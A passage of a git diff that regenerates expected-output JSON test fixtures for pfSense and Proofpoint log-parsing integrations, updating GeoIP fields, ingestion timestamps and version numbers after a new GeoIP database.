146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -415,19 +400,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -498,7 +478,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068531500Z", + "ingested": "2021-12-14T14:54:16.421212180Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -593,7 +573,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068536800Z", + "ingested": "2021-12-14T14:54:16.421212581Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS", "provider": "filterlog", "timezone": "-05:00", @@ -618,19 +598,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -701,7 +676,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068542100Z", + "ingested": "2021-12-14T14:54:16.421212948Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -726,19 +701,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -809,7 +779,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068547600Z", + "ingested": "2021-12-14T14:54:16.421213335Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -891,7 +861,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068553Z", + "ingested": "2021-12-14T14:54:16.421213708Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590279-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,3666,0,DF,17,udp,69,10.170.27.9,10.170.27.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -973,7 +943,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068558600Z", + "ingested": "2021-12-14T14:54:16.421214185Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590303-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,51896,0,DF,17,udp,69,10.170.27.9,192.168.1.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -998,19 +968,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1081,7 +1046,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068563900Z", + "ingested": "2021-12-14T14:54:16.421214558Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -1106,19 +1071,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1189,7 +1149,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068569700Z", + "ingested": "2021-12-14T14:54:16.421215174Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -1214,19 +1174,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1288,7 +1243,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068575200Z", + "ingested": "2021-12-14T14:54:16.421215555Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180", "provider": "filterlog", "timezone": "-05:00", @@ -1366,7 +1321,7 @@ }, "event": { "reason": "ip-option", - "ingested": "2021-12-09T13:44:42.068580500Z", + "ingested": "2021-12-14T14:54:16.421215922Z", "original": "\u003c134\u003e1 2021-09-14T15:31:58.860079-05:00 pfSense.example.com filterlog 72913 - - 176,,,1520797901,igb1.50,ip-option,pass,in,4,0xc0,,1,20651,0,none,2,igmp,32,10.100.10.23,224.0.0.1,datalength=8 ", "provider": "filterlog", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json index 55ea1dd7255..0e02e7bf9d6 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json @@ -43,7 +43,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:44:44.375894100Z", + "ingested": "2021-12-14T14:54:18.720979160Z", "original": "\u003c30\u003eAug 15 16:19:02 unbound[26931]: [26931:0] info: 192.168.1.1 api.opensubtitles.org. A IN", "provider": "unbound", "timezone": "-04:00", @@ -100,7 +100,7 @@ "ip": "172.16.33.2" }, "event": { - "ingested": "2021-12-09T13:44:44.375902400Z", + "ingested": "2021-12-14T14:54:18.720981903Z", "original": "\u003c30\u003eAug 15 16:18:59 unbound[26931]: [26931:2] info: 172.16.33.2 clients4.google.com. A IN", "provider": "unbound", "timezone": "-04:00", diff --git a/packages/pfsense/manifest.yml b/packages/pfsense/manifest.yml index 39950ac00bf..d4f4948c8d0 100644 --- a/packages/pfsense/manifest.yml +++ b/packages/pfsense/manifest.yml @@ -1,6 +1,6 @@ name: pfsense title: pfSense Logs -version: 0.2.1 +version: 0.2.2 release: experimental description: Collect and parse logs from pfSense devices with Elastic Agent. type: integration diff --git a/packages/proofpoint/changelog.yml b/packages/proofpoint/changelog.yml index 9f1e486955c..c5fca7c30c4 100644 --- a/packages/proofpoint/changelog.yml +++ b/packages/proofpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.5.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.5.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json b/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json index 68deda386cb..e6cfb05d75a 100644 --- a/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 avolupt low mod=perl cmd=clone cmd=olab id=nto duration=sse", "event": { - "ingested": "2021-06-09T13:10:40.441879200Z" + "ingested": "2021-12-14T14:54:22.370419656Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/02/12T13:12:33.umdo itessequ session_store[vol]: info luptat high s=nibus mod=mipsumq cmd=gnaali module=enatus rule=mquia folder=ameaqu pri=aqu duration=utper", "event": { - "ingested": "2021-06-09T13:10:40.441905500Z" + "ingested": "2021-12-14T14:54:22.370422164Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 emape low s=incidi mod=session_connect cmd=nse ip=10.46.185.46 country=temvel lip=iatu prot=serror hops_active=anti routes=ofdeF notroutes=metcons perlwait=roinBCS", "event": { - "ingested": "2021-06-09T13:10:40.441913600Z" + "ingested": "2021-12-14T14:54:22.370422671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/03/12T03:17:42.iam mqua queued-eurort[3391]: olab: from=mquisnos, size=5771, class=ore, nrcpts=etconsec, msgid=err, proto=rdp, daemon=mUt, tls_verify=usmodte, auth=ele, relay=tenbyCic5882.api.home [10.69.20.77]", "event": { - "ingested": "2021-06-09T13:10:40.441945200Z" + "ingested": "2021-12-14T14:54:22.370423068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 pteursi medium mod=service cmd=refresh cmd=turveli duration=toccae", "event": { - "ingested": "2021-06-09T13:10:40.441952400Z" + "ingested": "2021-12-14T14:54:22.370423469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 ccusan low mod=zerohour type=Ciceroi cmd=refresh id=aveniam version=uradi", "event": { - "ingested": "2021-06-09T13:10:40.441958800Z" + "ingested": "2021-12-14T14:54:22.370423862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 aboreetd high mod=smtpsrv cmd=listen cmd=dun addr=10.89.185.38", "event": { - "ingested": "2021-06-09T13:10:40.441965200Z" + "ingested": "2021-12-14T14:54:22.370424248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 ctetura medium mod=zerohour type=dolore cmd=init id=abor version=iqui", "event": { - "ingested": "2021-06-09T13:10:40.441971300Z" + "ingested": "2021-12-14T14:54:22.370424675Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 ritatis oloremi high s=icab mod=av_run cmd=mwr rule=fugi name=inculpaq cleaned=agna vendor=tionemu duration=eomnisis", "event": { - "ingested": "2021-06-09T13:10:40.441976900Z" + "ingested": "2021-12-14T14:54:22.370425056Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/06/05T21:33:08.incidi picia queued-reinject[mUtenima]: warn emaperi[7183]: sumquiad: from=dexeaco, size=6178, class=colabor, nrcpts=iusmodt, msgid=etdolo, proto=tcp, daemon=lorumw, relay=ommod3671.mail.domain", "event": { - "ingested": "2021-06-09T13:10:40.441982600Z" + "ingested": "2021-12-14T14:54:22.370425452Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 imadmi high s=tion mod=session_judge cmd=eataev module=liquide rule=uasia", "event": { - "ingested": "2021-06-09T13:10:40.441989100Z" + "ingested": "2021-12-14T14:54:22.370425870Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/07/04T11:38:16.uames tati access_run[utaliqu]: warn oriosamn medium s=santium m=iciatisu x=rehender mod=eporroqu cmd=uat rule=tem duration=est", "event": { - "ingested": "2021-06-09T13:10:40.441995200Z" + "ingested": "2021-12-14T14:54:22.370426410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 samvolu err eid=ittenbyC module=isc age=aturve limit=emulla", "event": { - "ingested": "2021-06-09T13:10:40.442000600Z" + "ingested": "2021-12-14T14:54:22.370426806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/08/02T01:43:25.itame eumfug zerohour_init[lit]: note asun low mod=quamnih type=oluptate cmd=onseq id=serunt version=aquaeabi", "event": { - "ingested": "2021-06-09T13:10:40.442005700Z" + "ingested": "2021-12-14T14:54:22.370427194Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 ento warn eid=pic status=\"evita file suntexp does not contain enough (or correct) info. Fix this or remove the file.\"", "event": { - "ingested": "2021-06-09T13:10:40.442011100Z" + "ingested": "2021-12-14T14:54:22.370427588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 tmo very-high s=abi mod=spam_run cmd=sectetur rule=uioffi policy=oru score=temqu ndrscore=edol ipscore=colab suspectscore=ommodico phishscore=quatD bulkscore=mcolab spamscore=67.309000 adjustscore=tenima adultscore=tsedqu classifier=agnid adjust=proide reason=dolorem scancount=tlab engine=volupt definitions=osqui raw=xerc tests=iutali duration=fdeFi", "event": { - "ingested": "2021-06-09T13:10:40.442016400Z" + "ingested": "2021-12-14T14:54:22.370427977Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/09/13T22:51:07.sequine ectio dkimv_type[dutper]: err lamcolab: low mod=radi unexpected response type=gel", "event": { - "ingested": "2021-06-09T13:10:40.442021800Z" + "ingested": "2021-12-14T14:54:22.370428479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 xeacomm very-high mod=av type=aturQui cmd=load id=utlabor", "event": { - "ingested": "2021-06-09T13:10:40.442035800Z" + "ingested": "2021-12-14T14:54:22.370428876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 madmi tur low s=uatD mod=mail_attachment cmd=ariatu id=edquiac file=nci mime=tev type=saute omime=ntocca oext=ostru corrupted=ntoccae protected=autf size=3471 virtual=temquiav", "event": { - "ingested": "2021-06-09T13:10:40.442041200Z" + "ingested": "2021-12-14T14:54:22.370429286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/10/26T19:58:50.tor qui queued-aglife[4499]: eavolup: to=fugiatn, delay=docon, xdelay=etconsec, mailer=ios, pri=evolu, relay=ersp3536.www5.lan, dsn=sauteiru, stat=mod", "event": { - "ingested": "2021-06-09T13:10:40.442046500Z" + "ingested": "2021-12-14T14:54:22.370429686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/11/10T03:01:24.iquipe itempor mail_env_rcpt[quin]: err upida high s=nve m=remag x=uredol mod=ccaecat cmd=tquiin r=7440 value=temqu verified=ovol routes=ptasn", "event": { - "ingested": "2021-06-09T13:10:40.442051700Z" + "ingested": "2021-12-14T14:54:22.370430082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 idolore low mod=spam type=eetdolo cmd=refresh id=cteturad engine=untut definitions=uamni", "event": { - "ingested": "2021-06-09T13:10:40.442057500Z" + "ingested": "2021-12-14T14:54:22.370430470Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 orumSe high mod=regulation type=isnost cmd=init id=queips action=cancel dict=itess file=iscinge", "event": { - "ingested": "2021-06-09T13:10:40.442062400Z" + "ingested": "2021-12-14T14:54:22.370430852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-12-23T12:09:07.inci atatn queued-alert[temUt]: info avol[752]: STARTTLS=essequam, relay=[10.193.83.81], version=1.5020, verify=str, cipher=iat, bits=etur", "event": { - "ingested": "2021-06-09T13:10:40.442068100Z" + "ingested": "2021-12-14T14:54:22.370431353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/01/06T07:11:41.isnostr umqu smtpsrv_run[tinv]: warn adipisc medium mod=isnisi cmd=ritatise rule=uamei duration=siut", "event": { - "ingested": "2021-06-09T13:10:40.442074100Z" + "ingested": "2021-12-14T14:54:22.370431743Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/01/20T14:14:16.ttenby boris dkimv_run[stenatu]: err isiuta low s=ratv m=riat x=ianon mod=tsed cmd=nts status=\"siut, tconsect\"", "event": { - "ingested": "2021-06-09T13:10:40.442079700Z" + "ingested": "2021-12-14T14:54:22.370432127Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/02/03T21:16:50.ctetura aveni sendmail[elit]: note seosqui sequamni[3866]: STARTTLS=tdol, relay=sit6590.lan [10.123.143.188], version=ncididun, verify=umSe, cipher=xeacomm, bits=cinge", "event": { - "ingested": "2021-06-09T13:10:40.442085200Z" + "ingested": "2021-12-14T14:54:22.370432606Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 runtmol very-high mod=spam type=odi cmd=load id=ptass", "event": { - "ingested": "2021-06-09T13:10:40.442090600Z" + "ingested": "2021-12-14T14:54:22.370432992Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 aec medium mod=spam type=iduntu cmd=load id=ccaeca", "event": { - "ingested": "2021-06-09T13:10:40.442095700Z" + "ingested": "2021-12-14T14:54:22.370433387Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 18 18:24:33 leumiu tla very-high s=uaeratv mod=session_connect cmd=isa ip=10.38.65.236 country=dqu lip=pid prot=rExc hops_active=iusmo routes=tame notroutes=naaliq perlwait=nte", "event": { - "ingested": "2021-06-09T13:10:40.442100600Z" + "ingested": "2021-12-14T14:54:22.370433770Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/04/02T01:27:07.ullamcor itationu dmarc_run[proident]: rprt maliquam medium s=atione m=lores x=ritati mod=orisni cmd=ons rule=remagn duration=ecillu", "event": { - "ingested": "2021-06-09T13:10:40.442106Z" + "ingested": "2021-12-14T14:54:22.370434157Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 umetMalo high mod=av type=utp cmd=refresh id=aeconseq vendor=lor engine=Sedut definitions=yCiceroi signatures=quunt", "event": { - "ingested": "2021-06-09T13:10:40.442111600Z" + "ingested": "2021-12-14T14:54:22.370434551Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 aliq low mod=access type=teni cmd=refresh id=dquiac action=accept dict=tore file=elits", "event": { - "ingested": "2021-06-09T13:10:40.442116100Z" + "ingested": "2021-12-14T14:54:22.370434936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/05/14T22:34:50.uamnihi risnis mail_release[uov]: info itlab low s=sBono m=loremqu x=tetur mod=amvo cmd=siuta status=failure err=ommodo", "event": { - "ingested": "2021-06-09T13:10:40.442122800Z" + "ingested": "2021-12-14T14:54:22.370435329Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 atv high mod=access type=quira cmd=refresh id=rehende action=block dict=obeataev file=tempor", "event": { - "ingested": "2021-06-09T13:10:40.442127500Z" + "ingested": "2021-12-14T14:54:22.370435835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 tlaboree note s=norumet m=dtempo x=tin module=fugitse action=deny size=3916", "event": { - "ingested": "2021-06-09T13:10:40.442132400Z" + "ingested": "2021-12-14T14:54:22.370436221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/06/26T19:42:33.aturQu aaliq session_store[mipsamvo]: warn eiusmod very-high s=reetdo m=oreveri x=ehende mod=eaqueip cmd=eum module=lamc rule=umetMal folder=asper pri=umq duration=naal", "event": { - "ingested": "2021-06-09T13:10:40.442136800Z" + "ingested": "2021-12-14T14:54:22.370436615Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/07/11T02:45:07.uto iuntNequ pdr_ttl[esseq]: warn aincidun low s=veniamq mod=occ ttl=oloreseo reply=\"\\\"iruredol rscore=veniamqu\\\"\"", "event": { - "ingested": "2021-06-09T13:10:40.442141100Z" + "ingested": "2021-12-14T14:54:22.370437037Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 minim ataevi low s=repreh mod=av_run cmd=plic rule=irured name=illumqui cleaned=saq vendor=amali duration=ate", "event": { - "ingested": "2021-06-09T13:10:40.442145200Z" + "ingested": "2021-12-14T14:54:22.370437430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/08/08T16:50:15.autfugi tasun mail_continue-system-sendmail[duntutla]: err ntium low s=asuntexp mod=adminim cmd=orisni action=cancel err=lmole", "event": { - "ingested": "2021-06-09T13:10:40.442149400Z" + "ingested": "2021-12-14T14:54:22.370437812Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/08/22T23:52:50.dolorem tem spam_init[exeacomm]: info aspe very-high mod=mides type=ciun cmd=olupta id=tsuntinc engine=inrepreh definitions=quovo", "event": { - "ingested": "2021-06-09T13:10:40.442153800Z" + "ingested": "2021-12-14T14:54:22.370438196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 occaec acommodi medium s=quaeab mod=mail_env_rcpt cmd=fici r=5161 value=dipiscin verified=olup routes=aco", "event": { - "ingested": "2021-06-09T13:10:40.442158Z" + "ingested": "2021-12-14T14:54:22.370438607Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/09/20T13:57:58.mag tob smtpsrv_load[dolores]: rprt equamnih high mod=deF type=itempo cmd=orumw id=redol", "event": { - "ingested": "2021-06-09T13:10:40.442162600Z" + "ingested": "2021-12-14T14:54:22.370438988Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 radipis high s=tiumto mod=mail_env_from cmd=litan value=nder qid=stenatus tls=equep routes=ever notroutes=tali host=BCS3474.lan ip=10.1.204.187 sampling=quin", "event": { - "ingested": "2021-06-09T13:10:40.442167Z" + "ingested": "2021-12-14T14:54:22.370439382Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/10/19T04:03:07.nculpaq culpaqui regulation_init[tvolup]: note tdolore low mod=col type=obea cmd=emp id=agnaaliq action=cancel dict=uptatem file=oinv", "event": { - "ingested": "2021-06-09T13:10:40.442171300Z" + "ingested": "2021-12-14T14:54:22.370439787Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "queued-reinject[2957]: odt", "event": { - "ingested": "2021-06-09T13:10:40.442175600Z" + "ingested": "2021-12-14T14:54:22.370440184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/11/16T18:08:15.caecat rautod rprt[olest]: info eataev very-high s=ritati m=edquia x=itesse mod=mullam cmd=mexerc secprofile_name=meaque rcpts=5808 duration=mip", "event": { - "ingested": "2021-06-09T13:10:40.442180200Z" + "ingested": "2021-12-14T14:54:22.370440572Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/12/01T01:10:49.deriti sintocc session_throttle[cididu]: rprt uteir high s=mwrit mod=ptat cmd=der rule=equuntur ip=10.219.133.187 rate=quameiu crate=diduntu limit=eiusmod", "event": { - "ingested": "2021-06-09T13:10:40.442184400Z" + "ingested": "2021-12-14T14:54:22.370440960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 tassita very-high mod=smtpsrv cmd=run cmd=oremi rule=ugitsedq duration=turmag", "event": { - "ingested": "2021-06-09T13:10:40.442188500Z" + "ingested": "2021-12-14T14:54:22.370441344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/12/29T15:15:58.consecte pteurs dkimv_run[catcupi]: info autf very-high s=tiaecon m=uaturve x=amquisno mod=uido cmd=tla signature=mquiad identity=CSe host=lors7553.api.local result=unknown result_detail=rroqui", "event": { - "ingested": "2021-06-09T13:10:40.442192600Z" + "ingested": "2021-12-14T14:54:22.370441733Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/01/12T22:18:32.itae 